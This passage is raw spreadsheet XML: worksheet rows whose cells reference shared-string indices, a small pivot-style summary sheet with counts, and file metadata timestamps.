      </c>
      <c r="D84" s="1" t="s">
        <v>174</v>
      </c>
      <c r="E84" s="1"/>
      <c r="F84" t="s">
        <v>147</v>
      </c>
    </row>
    <row r="85" spans="1:6" ht="17" x14ac:dyDescent="0.2">
      <c r="A85" s="1" t="s">
        <v>239</v>
      </c>
      <c r="B85" s="1" t="s">
        <v>168</v>
      </c>
      <c r="C85" s="1" t="s">
        <v>11</v>
      </c>
      <c r="D85" s="1" t="s">
        <v>175</v>
      </c>
      <c r="E85" s="1"/>
      <c r="F85" t="s">
        <v>147</v>
      </c>
    </row>
    <row r="86" spans="1:6" ht="17" x14ac:dyDescent="0.2">
      <c r="A86" s="1" t="s">
        <v>240</v>
      </c>
      <c r="B86" s="1" t="s">
        <v>168</v>
      </c>
      <c r="C86" s="1" t="s">
        <v>11</v>
      </c>
      <c r="D86" s="1" t="s">
        <v>176</v>
      </c>
      <c r="E86" s="1"/>
      <c r="F86" t="s">
        <v>147</v>
      </c>
    </row>
    <row r="87" spans="1:6" ht="17" x14ac:dyDescent="0.2">
      <c r="A87" s="1" t="s">
        <v>241</v>
      </c>
      <c r="B87" s="1"/>
      <c r="C87" s="1" t="s">
        <v>178</v>
      </c>
      <c r="D87" s="1" t="s">
        <v>177</v>
      </c>
      <c r="E87" s="1"/>
      <c r="F87" t="s">
        <v>147</v>
      </c>
    </row>
    <row r="88" spans="1:6" ht="17" x14ac:dyDescent="0.2">
      <c r="A88" s="1" t="s">
        <v>242</v>
      </c>
      <c r="B88" s="1"/>
      <c r="C88" s="1" t="s">
        <v>11</v>
      </c>
      <c r="D88" s="1" t="s">
        <v>179</v>
      </c>
      <c r="E88" s="1"/>
      <c r="F88" t="s">
        <v>147</v>
      </c>
    </row>
    <row r="89" spans="1:6" ht="17" x14ac:dyDescent="0.2">
      <c r="A89" s="1" t="s">
        <v>243</v>
      </c>
      <c r="B89" s="1" t="s">
        <v>40</v>
      </c>
      <c r="C89" s="1" t="s">
        <v>11</v>
      </c>
      <c r="D89" s="1" t="s">
        <v>180</v>
      </c>
      <c r="E89" s="1"/>
      <c r="F89" t="s">
        <v>147</v>
      </c>
    </row>
    <row r="90" spans="1:6" ht="17" x14ac:dyDescent="0.2">
      <c r="A90" s="1" t="s">
        <v>244</v>
      </c>
      <c r="B90" s="1" t="s">
        <v>39</v>
      </c>
      <c r="C90" s="1" t="s">
        <v>11</v>
      </c>
      <c r="D90" s="1" t="s">
        <v>181</v>
      </c>
      <c r="E90" s="1"/>
      <c r="F90" t="s">
        <v>147</v>
      </c>
    </row>
    <row r="91" spans="1:6" ht="17" x14ac:dyDescent="0.2">
      <c r="A91" s="1" t="s">
        <v>245</v>
      </c>
      <c r="B91" s="1" t="s">
        <v>39</v>
      </c>
      <c r="C91" s="1" t="s">
        <v>11</v>
      </c>
      <c r="D91" s="1" t="s">
        <v>182</v>
      </c>
      <c r="E91" s="1"/>
      <c r="F91" t="s">
        <v>147</v>
      </c>
    </row>
    <row r="92" spans="1:6" ht="17" x14ac:dyDescent="0.2">
      <c r="A92" s="1" t="s">
        <v>246</v>
      </c>
      <c r="B92" s="1" t="s">
        <v>40</v>
      </c>
      <c r="C92" s="1" t="s">
        <v>11</v>
      </c>
      <c r="D92" s="1" t="s">
        <v>183</v>
      </c>
      <c r="E92" s="1"/>
      <c r="F92" t="s">
        <v>147</v>
      </c>
    </row>
    <row r="93" spans="1:6" ht="17" x14ac:dyDescent="0.2">
      <c r="A93" s="1" t="s">
        <v>247</v>
      </c>
      <c r="B93" s="1" t="s">
        <v>40</v>
      </c>
      <c r="C93" s="1" t="s">
        <v>11</v>
      </c>
      <c r="D93" s="1" t="s">
        <v>184</v>
      </c>
      <c r="E93" s="1"/>
      <c r="F93" t="s">
        <v>147</v>
      </c>
    </row>
    <row r="94" spans="1:6" ht="17" x14ac:dyDescent="0.2">
      <c r="A94" s="1" t="s">
        <v>248</v>
      </c>
      <c r="B94" s="1"/>
      <c r="C94" s="1" t="s">
        <v>11</v>
      </c>
      <c r="D94" s="1" t="s">
        <v>185</v>
      </c>
      <c r="E94" s="1"/>
      <c r="F94" t="s">
        <v>147</v>
      </c>
    </row>
    <row r="95" spans="1:6" ht="34" x14ac:dyDescent="0.2">
      <c r="A95" s="1" t="s">
        <v>249</v>
      </c>
      <c r="B95" s="1"/>
      <c r="C95" s="1" t="s">
        <v>11</v>
      </c>
      <c r="D95" s="1" t="s">
        <v>186</v>
      </c>
      <c r="E95" s="1"/>
      <c r="F95" t="s">
        <v>147</v>
      </c>
    </row>
    <row r="96" spans="1:6" ht="17" x14ac:dyDescent="0.2">
      <c r="A96" s="1" t="s">
        <v>250</v>
      </c>
      <c r="B96" s="1"/>
      <c r="C96" s="1" t="s">
        <v>11</v>
      </c>
      <c r="D96" s="1" t="s">
        <v>187</v>
      </c>
      <c r="E96" s="1"/>
      <c r="F96" t="s">
        <v>147</v>
      </c>
    </row>
    <row r="97" spans="1:6" ht="17" x14ac:dyDescent="0.2">
      <c r="A97" s="1" t="s">
        <v>251</v>
      </c>
      <c r="B97" s="1"/>
      <c r="C97" s="1" t="s">
        <v>11</v>
      </c>
      <c r="D97" s="1" t="s">
        <v>188</v>
      </c>
      <c r="E97" s="1"/>
      <c r="F97" t="s">
        <v>147</v>
      </c>
    </row>
    <row r="98" spans="1:6" ht="17" x14ac:dyDescent="0.2">
      <c r="A98" s="1" t="s">
        <v>252</v>
      </c>
      <c r="B98" s="1"/>
      <c r="C98" s="1" t="s">
        <v>7</v>
      </c>
      <c r="D98" s="1" t="s">
        <v>32</v>
      </c>
      <c r="E98" s="1"/>
      <c r="F98" t="s">
        <v>147</v>
      </c>
    </row>
    <row r="99" spans="1:6" ht="17" x14ac:dyDescent="0.2">
      <c r="A99" s="1" t="s">
        <v>253</v>
      </c>
      <c r="B99" s="1"/>
      <c r="C99" s="1" t="s">
        <v>19</v>
      </c>
      <c r="D99" s="1" t="s">
        <v>189</v>
      </c>
      <c r="E99" s="1"/>
      <c r="F99" t="s">
        <v>147</v>
      </c>
    </row>
    <row r="100" spans="1:6" ht="17" x14ac:dyDescent="0.2">
      <c r="A100" s="1" t="s">
        <v>254</v>
      </c>
      <c r="B100" s="1"/>
      <c r="C100" s="1" t="s">
        <v>19</v>
      </c>
      <c r="D100" s="1" t="s">
        <v>190</v>
      </c>
      <c r="E100" s="1"/>
      <c r="F100" t="s">
        <v>147</v>
      </c>
    </row>
    <row r="101" spans="1:6" ht="17" x14ac:dyDescent="0.2">
      <c r="A101" s="1" t="s">
        <v>255</v>
      </c>
      <c r="B101" s="1"/>
      <c r="C101" s="1" t="s">
        <v>19</v>
      </c>
      <c r="D101" s="1" t="s">
        <v>191</v>
      </c>
      <c r="E101" s="1"/>
      <c r="F101" t="s">
        <v>147</v>
      </c>
    </row>
    <row r="102" spans="1:6" ht="17" x14ac:dyDescent="0.2">
      <c r="A102" s="1" t="s">
        <v>256</v>
      </c>
      <c r="B102" s="1" t="s">
        <v>12</v>
      </c>
      <c r="C102" s="1" t="s">
        <v>11</v>
      </c>
      <c r="D102" s="1" t="s">
        <v>192</v>
      </c>
      <c r="E102" s="1"/>
      <c r="F102" t="s">
        <v>147</v>
      </c>
    </row>
    <row r="103" spans="1:6" ht="34" x14ac:dyDescent="0.2">
      <c r="A103" s="1" t="s">
        <v>257</v>
      </c>
      <c r="B103" s="1" t="s">
        <v>12</v>
      </c>
      <c r="C103" s="1" t="s">
        <v>11</v>
      </c>
      <c r="D103" s="1" t="s">
        <v>193</v>
      </c>
      <c r="E103" s="1"/>
      <c r="F103" t="s">
        <v>147</v>
      </c>
    </row>
    <row r="104" spans="1:6" ht="17" x14ac:dyDescent="0.2">
      <c r="A104" s="1" t="s">
        <v>258</v>
      </c>
      <c r="B104" s="1"/>
      <c r="C104" s="1"/>
      <c r="D104" s="1" t="s">
        <v>194</v>
      </c>
      <c r="E104" s="1"/>
      <c r="F104" t="s">
        <v>147</v>
      </c>
    </row>
    <row r="105" spans="1:6" ht="85" x14ac:dyDescent="0.2">
      <c r="A105" s="1" t="s">
        <v>259</v>
      </c>
      <c r="B105" s="1"/>
      <c r="C105" s="1" t="s">
        <v>79</v>
      </c>
      <c r="D105" s="1" t="s">
        <v>195</v>
      </c>
      <c r="E105" s="1"/>
      <c r="F105" t="s">
        <v>147</v>
      </c>
    </row>
    <row r="106" spans="1:6" ht="17" x14ac:dyDescent="0.2">
      <c r="A106" s="1" t="s">
        <v>260</v>
      </c>
      <c r="B106" s="1" t="s">
        <v>39</v>
      </c>
      <c r="C106" s="1" t="s">
        <v>80</v>
      </c>
      <c r="D106" s="1" t="s">
        <v>196</v>
      </c>
      <c r="E106" s="1"/>
      <c r="F106" t="s">
        <v>147</v>
      </c>
    </row>
    <row r="107" spans="1:6" ht="17" x14ac:dyDescent="0.2">
      <c r="A107" s="1" t="s">
        <v>261</v>
      </c>
      <c r="B107" s="1" t="s">
        <v>39</v>
      </c>
      <c r="C107" s="1" t="s">
        <v>80</v>
      </c>
      <c r="D107" s="1" t="s">
        <v>197</v>
      </c>
      <c r="E107" s="1"/>
      <c r="F107" t="s">
        <v>147</v>
      </c>
    </row>
    <row r="108" spans="1:6" ht="17" x14ac:dyDescent="0.2">
      <c r="A108" s="1" t="s">
        <v>262</v>
      </c>
      <c r="B108" s="1" t="s">
        <v>168</v>
      </c>
      <c r="C108" s="1" t="s">
        <v>80</v>
      </c>
      <c r="D108" s="1" t="s">
        <v>198</v>
      </c>
      <c r="E108" s="1"/>
      <c r="F108" t="s">
        <v>147</v>
      </c>
    </row>
    <row r="109" spans="1:6" ht="17" x14ac:dyDescent="0.2">
      <c r="A109" s="1" t="s">
        <v>263</v>
      </c>
      <c r="B109" s="1"/>
      <c r="C109" s="1" t="s">
        <v>80</v>
      </c>
      <c r="D109" s="1" t="s">
        <v>199</v>
      </c>
      <c r="E109" s="1"/>
      <c r="F109" t="s">
        <v>147</v>
      </c>
    </row>
    <row r="110" spans="1:6" ht="17" x14ac:dyDescent="0.2">
      <c r="A110" s="1" t="s">
        <v>264</v>
      </c>
      <c r="B110" s="1"/>
      <c r="C110" s="1" t="s">
        <v>80</v>
      </c>
      <c r="D110" s="1" t="s">
        <v>200</v>
      </c>
      <c r="E110" s="1"/>
      <c r="F110" t="s">
        <v>147</v>
      </c>
    </row>
    <row r="111" spans="1:6" ht="17" x14ac:dyDescent="0.2">
      <c r="A111" s="1" t="s">
        <v>265</v>
      </c>
      <c r="B111" s="1"/>
      <c r="C111" s="1" t="s">
        <v>80</v>
      </c>
      <c r="D111" s="1" t="s">
        <v>201</v>
      </c>
      <c r="E111" s="1"/>
      <c r="F111" t="s">
        <v>147</v>
      </c>
    </row>
    <row r="112" spans="1:6" ht="17" x14ac:dyDescent="0.2">
      <c r="A112" s="1" t="s">
        <v>266</v>
      </c>
      <c r="B112" s="1"/>
      <c r="C112" s="1" t="s">
        <v>80</v>
      </c>
      <c r="D112" s="1" t="s">
        <v>202</v>
      </c>
      <c r="E112" s="1"/>
      <c r="F112" t="s">
        <v>147</v>
      </c>
    </row>
    <row r="113" spans="1:6" ht="17" x14ac:dyDescent="0.2">
      <c r="A113" s="1" t="s">
        <v>267</v>
      </c>
      <c r="B113" s="1"/>
      <c r="C113" s="1" t="s">
        <v>80</v>
      </c>
      <c r="D113" s="1" t="s">
        <v>203</v>
      </c>
      <c r="E113" s="1"/>
      <c r="F113" t="s">
        <v>147</v>
      </c>
    </row>
    <row r="114" spans="1:6" ht="17" x14ac:dyDescent="0.2">
      <c r="A114" s="1" t="s">
        <v>268</v>
      </c>
      <c r="B114" s="1" t="s">
        <v>205</v>
      </c>
      <c r="C114" s="1" t="s">
        <v>80</v>
      </c>
      <c r="D114" s="1" t="s">
        <v>204</v>
      </c>
      <c r="E114" s="1"/>
      <c r="F114" t="s">
        <v>147</v>
      </c>
    </row>
    <row r="115" spans="1:6" ht="17" x14ac:dyDescent="0.2">
      <c r="A115" s="1" t="s">
        <v>269</v>
      </c>
      <c r="B115" s="1"/>
      <c r="C115" s="1" t="s">
        <v>80</v>
      </c>
      <c r="D115" s="1" t="s">
        <v>206</v>
      </c>
      <c r="E115" s="1"/>
      <c r="F115" t="s">
        <v>147</v>
      </c>
    </row>
    <row r="116" spans="1:6" ht="17" x14ac:dyDescent="0.2">
      <c r="A116" s="1" t="s">
        <v>270</v>
      </c>
      <c r="B116" s="1"/>
      <c r="C116" s="1" t="s">
        <v>80</v>
      </c>
      <c r="D116" s="1" t="s">
        <v>207</v>
      </c>
      <c r="E116" s="1"/>
      <c r="F116" t="s">
        <v>147</v>
      </c>
    </row>
    <row r="117" spans="1:6" ht="17" x14ac:dyDescent="0.2">
      <c r="A117" s="1" t="s">
        <v>271</v>
      </c>
      <c r="B117" s="1"/>
      <c r="C117" s="1" t="s">
        <v>80</v>
      </c>
      <c r="D117" s="1" t="s">
        <v>208</v>
      </c>
      <c r="E117" s="1"/>
      <c r="F117" t="s">
        <v>147</v>
      </c>
    </row>
    <row r="118" spans="1:6" ht="17" x14ac:dyDescent="0.2">
      <c r="A118" s="1" t="s">
        <v>272</v>
      </c>
      <c r="B118" s="1"/>
      <c r="C118" s="1" t="s">
        <v>80</v>
      </c>
      <c r="D118" s="1" t="s">
        <v>209</v>
      </c>
      <c r="E118" s="1"/>
      <c r="F118" t="s">
        <v>147</v>
      </c>
    </row>
    <row r="119" spans="1:6" ht="17" x14ac:dyDescent="0.2">
      <c r="A119" s="1" t="s">
        <v>273</v>
      </c>
      <c r="B119" s="1"/>
      <c r="C119" s="1" t="s">
        <v>80</v>
      </c>
      <c r="D119" s="1" t="s">
        <v>210</v>
      </c>
      <c r="E119" s="1"/>
      <c r="F119" t="s">
        <v>147</v>
      </c>
    </row>
    <row r="120" spans="1:6" ht="17" x14ac:dyDescent="0.2">
      <c r="A120" s="1" t="s">
        <v>274</v>
      </c>
      <c r="B120" s="1"/>
      <c r="C120" s="1" t="s">
        <v>80</v>
      </c>
      <c r="D120" s="1" t="s">
        <v>211</v>
      </c>
      <c r="E120" s="1"/>
      <c r="F120" t="s">
        <v>147</v>
      </c>
    </row>
    <row r="121" spans="1:6" ht="17" x14ac:dyDescent="0.2">
      <c r="A121" s="1" t="s">
        <v>275</v>
      </c>
      <c r="B121" s="1"/>
      <c r="C121" s="1" t="s">
        <v>80</v>
      </c>
      <c r="D121" s="1" t="s">
        <v>212</v>
      </c>
      <c r="E121" s="1"/>
      <c r="F121" t="s">
        <v>147</v>
      </c>
    </row>
    <row r="122" spans="1:6" ht="17" x14ac:dyDescent="0.2">
      <c r="A122" s="1" t="s">
        <v>276</v>
      </c>
      <c r="B122" s="1"/>
      <c r="C122" s="1" t="s">
        <v>80</v>
      </c>
      <c r="D122" s="1" t="s">
        <v>213</v>
      </c>
      <c r="E122" s="1"/>
      <c r="F122" t="s">
        <v>147</v>
      </c>
    </row>
    <row r="123" spans="1:6" ht="17" x14ac:dyDescent="0.2">
      <c r="A123" s="1" t="s">
        <v>277</v>
      </c>
      <c r="B123" s="1"/>
      <c r="C123" s="1" t="s">
        <v>80</v>
      </c>
      <c r="D123" s="1" t="s">
        <v>214</v>
      </c>
      <c r="E123" s="1"/>
      <c r="F123" t="s">
        <v>147</v>
      </c>
    </row>
    <row r="124" spans="1:6" ht="17" x14ac:dyDescent="0.2">
      <c r="A124" s="1" t="s">
        <v>278</v>
      </c>
      <c r="B124" s="1"/>
      <c r="C124" s="1" t="s">
        <v>80</v>
      </c>
      <c r="D124" s="1" t="s">
        <v>215</v>
      </c>
      <c r="E124" s="1"/>
      <c r="F124" t="s">
        <v>147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401D-E40F-E64D-A5B5-C31DA4DE0441}">
  <dimension ref="A3:C6"/>
  <sheetViews>
    <sheetView tabSelected="1" workbookViewId="0">
      <selection activeCell="A12" sqref="A12"/>
    </sheetView>
  </sheetViews>
  <sheetFormatPr baseColWidth="10" defaultRowHeight="16" x14ac:dyDescent="0.2"/>
  <cols>
    <col min="1" max="1" width="108.5" bestFit="1" customWidth="1"/>
    <col min="2" max="2" width="15.5" bestFit="1" customWidth="1"/>
    <col min="3" max="3" width="11" bestFit="1" customWidth="1"/>
  </cols>
  <sheetData>
    <row r="3" spans="1:3" x14ac:dyDescent="0.2">
      <c r="A3" s="2" t="s">
        <v>143</v>
      </c>
      <c r="B3" t="s">
        <v>145</v>
      </c>
      <c r="C3" t="s">
        <v>146</v>
      </c>
    </row>
    <row r="4" spans="1:3" x14ac:dyDescent="0.2">
      <c r="A4" s="3" t="s">
        <v>6</v>
      </c>
      <c r="B4" s="4">
        <v>23</v>
      </c>
      <c r="C4" s="4">
        <v>60</v>
      </c>
    </row>
    <row r="5" spans="1:3" x14ac:dyDescent="0.2">
      <c r="A5" s="3" t="s">
        <v>147</v>
      </c>
      <c r="B5" s="4">
        <v>21</v>
      </c>
      <c r="C5" s="4">
        <v>63</v>
      </c>
    </row>
    <row r="6" spans="1:3" x14ac:dyDescent="0.2">
      <c r="A6" s="3" t="s">
        <v>144</v>
      </c>
      <c r="B6" s="4">
        <v>44</v>
      </c>
      <c r="C6" s="4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2025-02-26T18:54:03Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2025-04-23T19:39:34Z</dcterms:modified>
</cp:coreProperties>
</file>